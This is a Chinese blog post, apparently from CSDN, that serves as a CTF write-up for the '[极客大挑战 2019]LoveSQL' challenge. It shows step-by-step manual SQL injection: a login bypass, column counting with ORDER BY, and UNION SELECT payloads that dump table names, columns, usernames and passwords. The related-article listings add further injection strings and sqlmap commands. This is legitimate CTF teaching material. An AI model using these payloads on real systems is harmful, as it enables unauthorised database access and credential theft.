[极客大挑战 2019]LoveSQL

最新推荐文章于 2024-05-05 16:45:01 发布
最新推荐文章于 2024-05-05 16:45:01 发布
阅读量463 收藏 1
点赞数
分类专栏: 渗透测试 网络安全 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45237160/article/details/128619712
版权

访问目标地址,出现下面酷酷的页面,最上面有提示  用 sqlmap 是没有灵魂的,我用sqlmap扫了一下,果然扫不出来注入点

 首先随便输入账号密码进行测试

 

 万能语句注入测试,成功,判断为单引号字符型注入

 尝试联合注入,成功,判断列数为3列

order by为4时报错,为3时页面正常

 

 

 接下来测试回显点,为2,3

 

 接下来爆破数据库名,为geek

1' union select 1,2,database()#

 然后爆表名,有geekuser,l0ve1ysq1两个表  注意:数据库名字要用单引号括起来

(这里我在2那个地方注入会报错,只能在3那里注入成功,不知道什么原因) 

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

 然后爆列名,有三列:id,username,password

注意:表名字要用单引号括起来

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

 查询username分别是什么,发现名为flag

1' union select 1,2,group_concat(username) from l0ve1ysq1#

 找到flag对应的password,成功发现flag

1' union select 1,2,group_concat(password) from l0ve1ysq1#

 

 

 

做一个厉害的人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入——渗透day07
qq_62716256的博客
09-01 994
wql注入
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
关于sqlmap的两个小坑
weixin_34186950的博客
11-20 272
0x00 概述 近日在利用sqlmap注入测试时遇到一个奇怪的现象,高版本sqlmap无法检测出注入,但是低版本的可以测出注入,并且能跑出数据不是误报,经过对比测试和查看sqlmap源码,发现两个小坑。 0x01 情景重现 注入点形式:json……”whereparams”:[{“name”:”keyWord”,”value”:”test...
0x003 SQLMAP如何检测是否存在SQL注入
最新发布
A345545108的博客
05-05 989
casting = _(page) and not _(kb.originalPage) # 如果页面回显有异常字符串有True,反之为False。# 将生成的随机字符串拼接进入payload,如果我们conf的属性中prefix和suffix为空的话,这里直接就是randStr了。# 根据上面的返回来查看是否匹配了一些异常 也就是setting中定义的值和页面的内容来判断是否存在出入。随机生成长度为10的 且生成的内容的基础是HEURISTIC_CHECK_ALPHABET。
SQL注入的注入点找法
m0_67390969的博客
07-28 1745
2,交互点一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//www.xxx.com/index.phpid=1这种很大程度存在注入当然有些注入点不会这么一眼看出会有些比较复杂例如http//www.xxx.com50006/index.phpx=home&c=View&a=index&aid=9这样的地址其实也可能存在注入。1,注入点首先观察搜索框的地址是否是有与数据库交互,例如html这种几乎是不存在注入的所以要先判断是否有交互。...
[挑战 2019]LoveSQL1 题目分析与详解
2302_79800344的博客
02-27 829
一、题目简介。
[挑战 2019]LoveSQL1
whale_waves的博客
10-12 223
既然提示了sqlmap那就先用工具跑一遍吧。
sqlmap工具基本使用(检测sql注入)
m0_37570494的博客
01-25 6146
sqlmap的用户手册: sqlmap是python2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中: sqlmap主要用于sql注入方面的异常检测 Mysql数据库 1、先检测是否可以注入,先判断是否可以正常注入: sqlmap -u url -v 3 里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题 对于某些今天url可以在/a/b*.html尝试加入*号来进行此路径内的检测 2、爆库 sqlmap.py -u http://...
2019年三诺集团四周年庆典摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 学院JAVA视频教程 新版 7大部分
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博
BUUCTF WEB笔记之[挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL
weixin_48799157的博客
03-26 2600
小白一个,记录一下解题过程,如有错误请指正! 一、EasySQL 1.这里我们使用一句话万能密码就可以了,记得加上# 1' or '1'='1'# 2.登录就可以拿到flag 二、LoveSQL 网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~ 1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag 2.猜测flag应该是放在某个字段里了,我们用联合注入(un...
【CTF_SQL】[挑战 2019]LoveSQL 1
十二_的博客
10-22 2117
的WP来学习他们的思路,多刷题,以形成自己的思路,常刷,常总是不可避免的,尽管菜鸟小编并做不到。一般的套路使用之后,我们要先熟悉这个数据库相关SQL注入的基本语法或公式,才能进一步破解;这里,我们就需要对常用的一些编码格式有一定的了解。本道题,我们要观察它是什么编码?一开始,对于菜鸟级别的我们来说,一般是不了解的。再来回想一下,我们刚才出现的编码是什么?编码,参加过全国大学生数学建模大赛的或者知道。进入环境,我们就尝试去最经典的万能密码。不信,咱们最好还是测试一下吧,有点像。所以,sql注入是可以的~~~
[挑战 2019]LoveSQL 1(SQL注入)
小谢的博客
06-12 4788
[挑战 2019]LoveSQL 1(SQL注入)
[挑战 2019]EasySQL
qq_52431855的博客
05-31 262
首先尝试注入发现是字符型注入。并且后台两个双引号闭合的 "" 然后尝试万能密码 1' or '1'='1 成功登录
BUUCTF[挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4088
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
[挑战 2019]LoveSQL(最基础的sql注入,万能密码登录)
热门推荐
qq_45521281的博客
04-15 1万+
进去之后: 发现登录框,可能是万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 点击登录 跳转到了check.php页面。并得到了用户名和密码: 尝试密码md5解密失败,还是回到注入的思路上,查询字段数: 在url中输入: /check.php?username=admin' order by 3%23&password=1 ...
sqlmap入门-判断注入点
weixin_46626737的博客
11-14 6807
①找到目标站,查看源代码,或者查找子链接,寻找可以尝试注入的参数,大多为$POST['a'],也有$GET['a'],当中a为可尝试注入的参数 还有比如点击子链接url中出现http://www.*****.com/****.php?a=1 出现http://www.******.com/*****.php?a=1&b=a等等 ②get型的注入命令,基本为python sqlmap.py(换到相应路径) -u "url" --level 1-5 ③post型的注入命令给,可以用brup...
挑战 2019]LoveSQL 1
08-24
LoveSQL 1是挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是挑战2019中的一个具体题目,与其他题目无关。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值